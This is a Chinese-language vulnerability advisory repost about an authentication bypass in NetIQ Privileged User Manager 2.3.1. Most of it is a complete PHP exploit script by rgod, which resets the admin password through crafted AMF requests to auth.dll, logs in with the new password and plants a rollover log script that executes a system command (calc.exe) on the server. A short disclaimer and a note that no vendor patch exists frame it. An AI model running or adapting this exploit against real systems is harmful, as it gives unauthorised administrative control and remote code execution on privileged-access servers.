NetIQ Privileged User Manager管理密码更改身份验证绕过漏洞

文章由LinuxBoy分享于2019-04-02 05:04:57热评（21）

NetIQ Privileged User Manager管理密码更改身份验证绕过漏洞

发布日期：2012-11-15
更新日期：2012-11-17

受影响系统：
netiq Privileged User Manager
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 56535

NetIQ Privileged User Manager是安全访问UNIX、Linux和Windows系统的解决方案。

NetIQ Privileged User Manager在实现上存在身份验证绕过漏洞，成功利用后可允许攻击者绕过安全限制并更改管理员密码。

<*来源：rgod （rgod@autistici.org）
*>

测试方法：
--------------------------------------------------------------------------------

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<?php
/*
Novell NetIQ Privileged User Manager 2.3.1 auth.dll pa_modify_accounts()
Remote Code Execution Exploit

Expected output:

C:\php>php 9sg_novell_netiq_i.php 192.168.0.1
[*] Attacking auth.dll ...
[*] Modifying admin password...
[*] Done. Proceeding to next steps.
[*] svc_name -> somename
[*] Logging in...
[*] Logged in: succeeded
[*] Identity Token -> AJzj8ExJzSvJLKlkyOd0LC3JCMnPTs1jKGbJS8xNZU1Myc3My+TIzEtMLsksS92h4MlWUlySmFvQ2rx3W34xd1Fqbn5JanxGfn
EJr6GlkZ6hmYUekDQwLOYsSE0tAkuwJeYlFKUmJrIE5eekAg0uAlKMWgwFfIhFDEAnB2em5yWWlBalMlQxF2emNzI4yb514E3S1Psv3PQj94Lq9jBuq84bVg
65m57viBBllf1m0C680ZrLr0zaOSn7RrbfG/vt4TuXWd1p/J7qFpqwVTRuZvl2kVWy21hj8yukZwhVhskfNzBYYsIh8M04ZJVuaPcB4x/7lX3Nj8ivnbBMJH
t37cPgB9EJ8058WvT2rGdJK3fJ7SqmzBSR6J8yTYat7DaiRw+8T2md+WGbW0gGAwM4Ap95pA==
[*] Setting up a rollover script which launches calc.exe
[*] Done. The following perl script will be launched in 5 seconds :
system("calc.exe");

C:\php>

rgod
*/
error_reporting(E_ALL ^ E_NOTICE);
set_time_limit(0);
$err[0] = "[!] This script is intended to be launched from the cli!";
$err[1] = "[!] You need the curl extesion loaded!";
if (php_sapi_name() <> "cli") {
die($err[0]);
}

function syntax() {
print("usage: php 9sg_novell_netiq_i.php [ip_address]\r\n" );
die();
}

$argv[1] ? print("[*] Attacking auth.dll ...\n") :
syntax();

if (!extension_loaded('curl')) {
$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true :
false;
if ($win) {
!dl("php_curl.dll") ? die($err[1]) :
print("[*] curl loaded\n");
} else {
!dl("php_curl.so") ? die($err[1]) :
print("[*] curl loaded\n");
}
}

function _s($url, $is_post, $ck, $request) {
global $_use_proxy, $proxy_host, $proxy_port;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
if ($is_post) {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $request);
}
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
"Cookie: ".$ck,
"Content-Type: application/x-amf", //do not touch this, important
"x-flash-version: 11,4,402,278"
));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; BOIE9;ENUSMSCOM)");
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 15);

if ($_use_proxy) {
curl_setopt($ch, CURLOPT_PROXY, $proxy_host.":".$proxy_port);
}
$_d = curl_exec($ch);
if (curl_errno($ch)) {
//die("[!] ".curl_error($ch)."\n");
} else {
curl_close($ch);
}
return $_d;
}

/*********************************** config **********************************/
$host = $argv[1];
$port = 443;
$pwd="rgod_777_"; //by default minimum length = 8, minimum alpha = 1, minimum numeric = 1
$script="system(\"calc.exe\");";
/*****************************************************************************/

print("[*] Modifying admin password...\n");

$data="\x00\x00\x00\x00\x00\x01\x00\x13\x53\x50\x46\x2e\x55\x74\x69\x6c". // ........SPF.Util
"\x2e\x63\x61\x6c\x6c\x4d\x61\x73\x74\x65\x72\x00\x04\x2f\x32\x36". // .callMaster../26
"\x32\x00\x00\x02\x98\x0a\x00\x00\x00\x01\x03\x00\x06\x6d\x65\x74". // 2............met
"\x68\x6f\x64\x02".
"\x00\x0e".
"modifyAccounts". //boom
"\x00\x06\x6d".
"\x6f\x64\x75\x6c\x65\x02\x00\x04\x61\x75\x74\x68\x00\x04\x55\x73". // odule...auth..Us
"\x65\x72\x03\x00\x04\x6e\x61\x6d\x65\x02".
"\x00\x05".
"admin".
"\x00\x09\x41\x43\x54\x5f\x53\x55\x50\x45\x52\x03\x00\x05\x76\x61". // ..ACT_SUPER...va
"\x6c\x75\x65\x00\x3f\xf0\x00\x00\x00\x00\x00\x00\x00\x06\x61\x63". // lue.?.........ac
"\x74\x69\x6f\x6e\x02\x00\x03\x73\x65\x74\x00\x00\x09\x00\x0b\x41". // tion...set.....A
"\x43\x54\x5f\x43\x4f\x4d\x4d\x45\x4e\x54\x03\x00\x05\x76\x61\x6c". // CT_COMMENT...val
"\x75\x65\x02\x00\x04\x61\x73\x64\x64\x00\x06\x61\x63\x74\x69\x6f". // ue...asdd..actio
"\x6e\x02\x00\x03\x73\x65\x74\x00\x00\x09\x00\x0a\x41\x43\x54\x5f". // n...set.....ACT_
"\x50\x41\x53\x53\x57\x44\x03\x00\x05\x76\x61\x6c\x75\x65\x02". // PASSWD...value..
pack("n",strlen($pwd)). //16 bit, big endian
$pwd.
"\x00\x06\x61\x63\x74\x69\x6f".
"\x6e\x02\x00\x03\x73\x65\x74\x00\x00\x09\x00\x08\x41\x43\x54\x5f". // n...set.....ACT_
"\x44\x45\x53\x43\x03\x00\x05\x76\x61\x6c\x75\x65\x02\x00\x03\x73". // DESC...value...s
"\x64\x73\x00\x06\x61\x63\x74\x69\x6f\x6e\x02\x00\x03\x73\x65\x74". // ds..action...set
"\x00\x00\x09\x00\x00\x09\x00\x03\x75\x69\x64\x06\x00\x00\x09"; // ........uid....
$url = "https://$host:$port/";
$out = _s($url, 1, "_SID_=1;", $data);
//print(hex_dump($out)."\n");
print("[*] Done. Proceeding to next steps.\n");
$tmp=explode("svc",$out);$tmp=$tmp[1];$len=unpack("n",$tmp[1].$tmp[2]);
$svc_name="";
for ($i=0; $i<$len[1]; $i++){
$svc_name.=$tmp[$i + 3];
}
echo "[*] svc_name -> ".$svc_name."\n";
echo "[*] Logging in...\n";
$data=
"\x00\x00\x00\x00\x00\x01\x00\x15\x53\x50\x46\x2e\x55\x74\x69". // .........SPF.Uti
"\x6c\x2e\x63\x61\x6c\x6c\x4d\x6f\x64\x75\x6c\x65\x45\x78\x00\x02". // l.callModuleEx..
"\x2f\x34\x00\x00\x00\x65\x0a\x00\x00\x00\x01\x03\x00\x03\x70\x6b". // /4...e........pk
"\x74\x03\x00\x0b\x43\x72\x65\x64\x65\x6e\x74\x69\x61\x6c\x73\x03". // t...Credentials.
"\x00\x04\x6e\x61\x6d\x65\x02\x00\x05\x61\x64\x6d\x69\x6e\x00\x06". // ..name...admin..
"\x70\x61\x73\x73\x77\x64\x02".
pack("n",strlen($pwd)).
$pwd.
"\x00\x00\x09".
"\x00\x06\x6d\x65\x74\x68\x6f\x64\x02\x00\x05\x6c\x6f\x67\x69\x6e". // ..method...login
"\x00\x06\x6d\x6f\x64\x75\x6c\x65\x02\x00\x04\x61\x75\x74\x68\x00". // ..module...auth.
"\x03\x75\x69\x64\x06\x00\x00\x09\x00\x00\x09"; // .uid.......
$url = "https://$host:$port/";
$out = _s($url, 1, "", $data);
//print(hex_dump($out)."\n");
if (strpos($out,"successfully\x20authenticated")){
echo "[*] Logged in: succeeded\n";
} else {
die("[!] Exploit failed");
}
$tmp=explode("Identity\x03\0\x07content\x02",$out);
$tmp=$tmp[1];
$len=unpack("n",$tmp[0].$tmp[1]);
$identity="";
for ($i=0; $i<$len[1]; $i++){
$identity.=$tmp[$i + 2];
}
echo "[*] Identity Token -> ".$identity."\n";
echo "[*] Setting up a rollover script which launches calc.exe\n";
$data=
"\x00\x00\x00\x00\x00\x01".
"\x00\x14".
"SPF.Util.callModuleA".
"\x00\x04".
"/165".
"\x00\x00\x02\x86\x0a\x00\x00\x00\x01\x03".
"\x00\x03".
"pkt".
"\x03".
"\x00\x06".
"method".
"\x02".
"\x00\x0c".
"setLogConfig".
"\x00\x06".
"module".
"\x02".
"\x00\x07".
"regclnt".
"\x00\x03".
"Log".
"\x03".
"\x00\x04".
"file".
"\x02".
"\x00\x09".
"mylog.log".
"\x00\x05".
"level".
"\x02".
"\x00\x05".
"trace".
"\x00\x08".
"max_size".
"\x00\x40\x24\x00".
"\x00\x00\x00\x00\x00".
"\x00\x0b".
"min_log_lvl".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x08".
"rollover".
"\x02".
"\x00\x02".
"s5". // repeat every 5 seconds, 1 hour = H1
"\x00\x06".
"Script".
"\x03".
"\x00\x07".
"content".
"\x02".
pack("n",strlen($script) + 4).
$script.
"\x0a\x0a".
"1;".
"\x00\x00\x09".
"\x00\x00\x09".
"\x00\x03".
"uid".
"\x02".
pack("n",strlen($identity)).
$identity.
"\x00\x00\x09".
"\x00\x08".
"svc_name".
"\x02".
pack("n",strlen($svc_name)).
$svc_name.
"\x00\x00\x09";

$url = "https://$host:$port/";
$out = _s($url, 1, "", $data);
//print(hex_dump($out)."\n");
echo "[*] Done. The following perl script will be launched in 5 seconds :\n".$script."\n";
?>

建议：
--------------------------------------------------------------------------------
厂商补丁：

netiq
-----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

https://www.netiq.com/products/

推荐文章：

NetIQ Privileged User Manager管理密码更改身份验证绕过漏洞